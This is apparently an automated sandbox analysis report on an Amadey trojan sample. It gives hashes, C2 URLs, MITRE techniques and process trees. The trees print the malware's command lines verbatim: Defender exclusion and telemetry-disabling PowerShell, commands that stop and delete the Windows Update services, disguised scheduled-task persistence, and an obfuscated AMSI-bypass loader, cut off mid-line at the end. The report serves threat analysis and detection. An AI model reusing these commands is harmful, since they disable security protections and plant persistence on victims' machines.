amadey | 974a488f846e09b83c1ce8224d649e229561e6f022d31ff01a6438ccb1e26f8b

Resubmissions

20-03-2023 09:26

230320-lekscscg39 10

Analysis

max time kernel
50s
max time network
105s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
20-03-2023 09:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

99cb969e-5c61-4204-9902-f21da96b8e7a.exe
Size

113KB
MD5

86dc268e1263407b2a5a1a8f874d282a
SHA1

a4f0cef3711c85a65c43b27025bf373f10a84845
SHA256

974a488f846e09b83c1ce8224d649e229561e6f022d31ff01a6438ccb1e26f8b
SHA512

e792c226f23a04b692bb378ea3da6f5fbe6789e213e46c8316d6f684df7d5f28796f7e20300c8de853455d0a1bcce27ee0191ccc716195fef2717b20272845a6
SSDEEP

1536:Wurgu5SIr4FidRnablY5Rh+iqBUQMdzb:Wur9kuPnablIp6hi

Score

10^/10

amadey evasion trojan

Malware Config

Extracted

Family

amadey

Version

3.68

nestleservers.xyz/so57Nst/index.php

nestlehosts.xyz/so57Nst/index.php

nestlecareers.cf/so57Nst/index.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WeatherApp.exe99cb969e-5c61-4204-9902-f21da96b8e7a.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	WeatherApp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	99cb969e-5c61-4204-9902-f21da96b8e7a.exe

Drops startup file 2 IoCs

Processes:

WeatherApp.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WeatherApp.exe	WeatherApp.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WeatherApp.exe	WeatherApp.exe

Executes dropped EXE 6 IoCs

Processes:

WeatherApp.exeWeatherApp.exeWeatherApp.exeWeatherApp.exeWeatherApp.exeWinUIUpdate.exe

pid process

2924 WeatherApp.exe
3296 WeatherApp.exe
4264 WeatherApp.exe
4712 WeatherApp.exe
4796 WeatherApp.exe
4484 WinUIUpdate.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

WeatherApp.exe

description pid process target process

PID 2924 set thread context of 4796 2924 WeatherApp.exe WeatherApp.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

2248 sc.exe
1456 sc.exe
4768 sc.exe
1840 sc.exe
1508 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
2924	WeatherApp.exe
3296	WeatherApp.exe
4264	WeatherApp.exe
4712	WeatherApp.exe
4796	WeatherApp.exe
4484	WinUIUpdate.exe

description	pid	process	target process
PID 2924 set thread context of 4796	2924	WeatherApp.exe	WeatherApp.exe

pid	process
2248	sc.exe
1456	sc.exe
4768	sc.exe
1840	sc.exe
1508	sc.exe

Suspicious behavior: EnumeratesProcesses 52 IoCs

Processes:

powershell.exeWeatherApp.exepowershell.exepowershell.exepowershell.exe

pid	process
4952	powershell.exe
4952	powershell.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
2924	WeatherApp.exe
4016	powershell.exe
4016	powershell.exe
1480	powershell.exe
1480	powershell.exe
3312	powershell.exe
3312	powershell.exe
3312	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exeWeatherApp.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	2924	WeatherApp.exe
Token: SeDebugPrivilege	4016	powershell.exe
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeDebugPrivilege	3312	powershell.exe

Suspicious use of WriteProcessMemory 42 IoCs

Processes:

99cb969e-5c61-4204-9902-f21da96b8e7a.exeWeatherApp.exeWeatherApp.execmd.execmd.exe

description	pid	process	target process
PID 1400 wrote to memory of 4952	1400	99cb969e-5c61-4204-9902-f21da96b8e7a.exe	powershell.exe
PID 1400 wrote to memory of 4952	1400	99cb969e-5c61-4204-9902-f21da96b8e7a.exe	powershell.exe
PID 1400 wrote to memory of 4952	1400	99cb969e-5c61-4204-9902-f21da96b8e7a.exe	powershell.exe
PID 1400 wrote to memory of 2924	1400	99cb969e-5c61-4204-9902-f21da96b8e7a.exe	WeatherApp.exe
PID 1400 wrote to memory of 2924	1400	99cb969e-5c61-4204-9902-f21da96b8e7a.exe	WeatherApp.exe
PID 1400 wrote to memory of 2924	1400	99cb969e-5c61-4204-9902-f21da96b8e7a.exe	WeatherApp.exe
PID 2924 wrote to memory of 3296	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 3296	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 3296	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 4264	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 4264	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 4264	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 4712	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 4712	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 4712	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 4796	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 4796	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 4796	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 4796	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 4796	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 4796	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 4796	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 4796	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 4796	2924	WeatherApp.exe	WeatherApp.exe
PID 2924 wrote to memory of 4796	2924	WeatherApp.exe	WeatherApp.exe
PID 4796 wrote to memory of 1680	4796	WeatherApp.exe	cmd.exe
PID 4796 wrote to memory of 1680	4796	WeatherApp.exe	cmd.exe
PID 4796 wrote to memory of 1680	4796	WeatherApp.exe	cmd.exe
PID 1680 wrote to memory of 4016	1680	cmd.exe	powershell.exe
PID 1680 wrote to memory of 4016	1680	cmd.exe	powershell.exe
PID 1680 wrote to memory of 4016	1680	cmd.exe	powershell.exe
PID 4796 wrote to memory of 1324	4796	WeatherApp.exe	cmd.exe
PID 4796 wrote to memory of 1324	4796	WeatherApp.exe	cmd.exe
PID 4796 wrote to memory of 1324	4796	WeatherApp.exe	cmd.exe
PID 1324 wrote to memory of 1480	1324	cmd.exe	powershell.exe
PID 1324 wrote to memory of 1480	1324	cmd.exe	powershell.exe
PID 1324 wrote to memory of 1480	1324	cmd.exe	powershell.exe
PID 4796 wrote to memory of 4484	4796	WeatherApp.exe	WinUIUpdate.exe
PID 4796 wrote to memory of 4484	4796	WeatherApp.exe	WinUIUpdate.exe
PID 1680 wrote to memory of 3312	1680	cmd.exe	powershell.exe
PID 1680 wrote to memory of 3312	1680	cmd.exe	powershell.exe
PID 1680 wrote to memory of 3312	1680	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\99cb969e-5c61-4204-9902-f21da96b8e7a.exe
"C:\Users\Admin\AppData\Local\Temp\99cb969e-5c61-4204-9902-f21da96b8e7a.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1400

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Add-MpPreference -ExclusionPath 'C:\'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4952

C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe
"C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe"
2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2924

C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe
"C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe"
3⤵
- Executes dropped EXE
PID:3296

C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe
"C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe"
3⤵
- Executes dropped EXE
PID:4264

C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe
"C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe"
3⤵
- Executes dropped EXE
PID:4712

C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe
"C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000151021\test.cmd" "
4⤵
- Suspicious use of WriteProcessMemory
PID:1680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Add-MpPreference -ExclusionPath "C:"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Add-MpPreference -ExclusionExtension exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3312

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Set-MpPreference -MAPSReporting Disable
5⤵
PID:5068

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Set-MpPreference -SubmitSamplesConsent NeverSend
5⤵
PID:944

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Add-MpPreference -ExclusionPath $env:UserProfile
5⤵
PID:5112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Add-MpPreference -ExclusionPath $env:ProgramFiles
5⤵
PID:3380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\1000157020\test.cmd" "
4⤵
- Suspicious use of WriteProcessMemory
PID:1324

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Add-MpPreference -ExclusionPath "C:"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1480

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Add-MpPreference -ExclusionExtension exe
5⤵
PID:1420

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Set-MpPreference -MAPSReporting Disable
5⤵
PID:764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Set-MpPreference -SubmitSamplesConsent NeverSend
5⤵
PID:3304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Add-MpPreference -ExclusionPath $env:UserProfile
5⤵
PID:2264

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Add-MpPreference -ExclusionPath $env:ProgramFiles
5⤵
PID:4668

C:\Users\Admin\AppData\Roaming\1000158000\WinUIUpdate.exe
"C:\Users\Admin\AppData\Roaming\1000158000\WinUIUpdate.exe"
4⤵
- Executes dropped EXE
PID:4484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:4628

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:4708

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:2248

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:1456

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:4768

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:1840

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:1508

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
2⤵
PID:4076

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
2⤵
PID:5032

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
2⤵
PID:2164

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
2⤵
PID:3244

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:3612

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:4948

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:4672

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:4936

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:1516

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:1576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#srdzkpcvs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineUA' /tr '''C:\Program Files\Google\Chrome\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineUA' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineUA" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\chromeupdater.exe' }
1⤵
PID:2520

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
1⤵
PID:2648

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:DyMvojvnkGwv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NFsvjtRDpQkFHQ,[Parameter(Position=1)][Type]$WbNRgvvFuH)$ZLqbgLyAcVa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'M'+'e'+''+[Char](109)+'or'+[Char](121)+'M'+[Char](111)+''+[Char](100)+'u'+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+''+[Char](108)+''+'e'+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'T'+'y'+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+'P'+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+''+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+'A'+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+[Char](65)+'u'+'t'+''+'o'+''+'C'+'l'+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$ZLqbgLyAcVa.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'al'+[Char](78)+'a'+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+'g,'+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$NFsvjtRDpQkFHQ).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+'m'+'e,'+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+'e'+'d'+'');$ZLqbgLyAcVa.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+'oke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+'e'+[Char](119)+''+'S'+''+[Char](108)+''+'o'+'t'+','+''+'V'+''+[Char](105)+'r'+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$WbNRgvvFuH,$NFsvjtRDpQkFHQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+'e'+','+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $ZLqbgLyAcVa.CreateType();}$aUaUKhfajdiQW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+'t'+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+'i'+'c'+''+'r'+'o'+'s'+''+[Char](111)+''+[Char](102)+'t'+'.'+''+[Char](87)+''+[Char](105)+'n32'+[Char](46)+'U'+'n'+''+[Char](115)+''+[Char](97)+'f'+[Char](101)+'a'+[Char](85)+''+[Char](97)+''+'U'+''+[Char](75)+'h'+'f'+'a'+[Char](106)+'d'+[Char](105)+'Q'+[Char](87)+'');$enGpyQqaBkiBfK=$aUaUKhfajdiQW.GetMethod(''+[Char](101)+''+[Char](110)+''+[Char](71)+'p'+[Char](121)+''+[Char](81)+''+'q'+''+[Char](97)+''+'B'+''+[Char](107)+'i'+[Char](66)+'f'+'K'+'',[Reflection.BindingFlags]''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+'t'+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DBwGwzOfNKgflWmzOxw=DyMvojvnkGwv @([String])([IntPtr]);$axoqtsvoRRiJkOjeKnddud=DyMvojvnkGwv @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jTeAFIsKbmL=$aUaUKhfajdiQW.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](77)+'o'+'d'+''+'u'+'l'+[Char](101)+'H'+[Char](97)+'n'+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+'n'+'e'+'l'+''+[Char](51)+''+'2'+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')));$TZSnMLXmfKQbKW=$enGpyQqaBkiBfK.Invoke($Null,@([Object]$jTeAFIsKbmL,[Object](''+[Char](76)+'o'+[Char](97)+'d'+[Char](76)+''+'i'+''+'b'+''+[Char](114)+'a'+'r'+'y'+'A'+'')));$zeuqlDfHmhefOylxI=$enGpyQqaBkiBfK.Invoke($Null,@([Object]$jTeAFIsKbmL,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+'P'+''+[Char](114)+'ot'+[Char](101)+'c'+[Char](116)+'')));$mVJgALL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TZSnMLXmfKQbKW,$DBwGwzOfNKgflWmzOxw).Invoke(''+'a'+''+'m'+'s'+'i'+'.'+[Char](100)+''+'l'+''+'l'+'');$OEdJsUeqnYmKuioSB=$enGpyQqaBkiBfK.Invoke($Null,@([Object]$mVJgALL,[Object]('A'+'m'+''+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+'B'+''+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$UdOTrepziU=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zeuqlDfHmhefOylxI,$axoqtsvoRRiJkOjeKnddud).Invoke($OEdJsUeqnYmKuioSB,[uint32]8,4,[ref]$UdOTrepziU);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$OEdJsUeqnYmKuioSB,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zeuqlDfHmhefOylxI,$axoqtsvoRRiJkOjeKnddud).Invoke($OEdJsUeqnYmKuioSB,[uint32]8,0x20,[ref]$UdOTrepziU);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+''+[Char](84)+''+'W'+''+[Char](65)+'RE').GetValue(''+'d'+'i'+'a'+''+'l'+''+[Char](101)+''+[Char](114)+''+'s'+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)
1⤵
PID:4712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AiuuaDIIXeAN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aTrNDIOHcTLycH,[Parameter(Position=1)][Type]$eyaDLOojvA)$tzBJkUHSshU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+'f'+''+[Char](108)+''+[Char](101)+'ct'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'ga'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'e'+[Char](109)+'or'+[Char](121)+''+'M'+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+'l'+'eg'+'a'+'te'+[Char](84)+''+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+'la'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+'ubli'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+'C'+'l'+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$tzBJkUHSshU.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+'N'+'a'+'m'+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+'i'+''+'g'+''+','+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$aTrNDIOHcTLycH).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+'ag'+'e'+''+[Char](100)+'');$tzBJkUHSshU.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+'c'+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+','+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+'o'+'t'+[Char](44)+''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$eyaDLOojvA,$aTrNDIOHcTLycH).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+'m'+'e,Ma'+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $tzBJkUHSshU.CreateType();}$zCGfyCURtPZrg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+'t'+'e'+'m'+'.'+[Char](100)+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+'cr'+'o'+'s'+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+'U'+[Char](110)+''+'s'+''+'a'+''+[Char](102)+'ez'+'C'+''+'G'+''+[Char](102)+'y'+[Char](67)+''+'U'+''+[Char](82)+''+'t'+'P'+[Char](90)+''+[Char](114)+''+[Char](103)+'');$URFIYjEflZYrSe=$zCGfyCURtPZrg.GetMethod(''+'U'+''+'R'+''+[Char](70)+''+[Char](73)+''+'Y'+'j'+[Char](69)+''+'f'+''+'l'+''+[Char](90)+''+'Y'+''+'r'+''+'S'+''+'e'+'',[Reflection.BindingFlags]''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$QTBqfSiCGQsUswBykzE=AiuuaDIIXeAN @([String])([IntPtr]);$gdPxQmAiKzRFOUisgEJDTx=AiuuaDIIXeAN 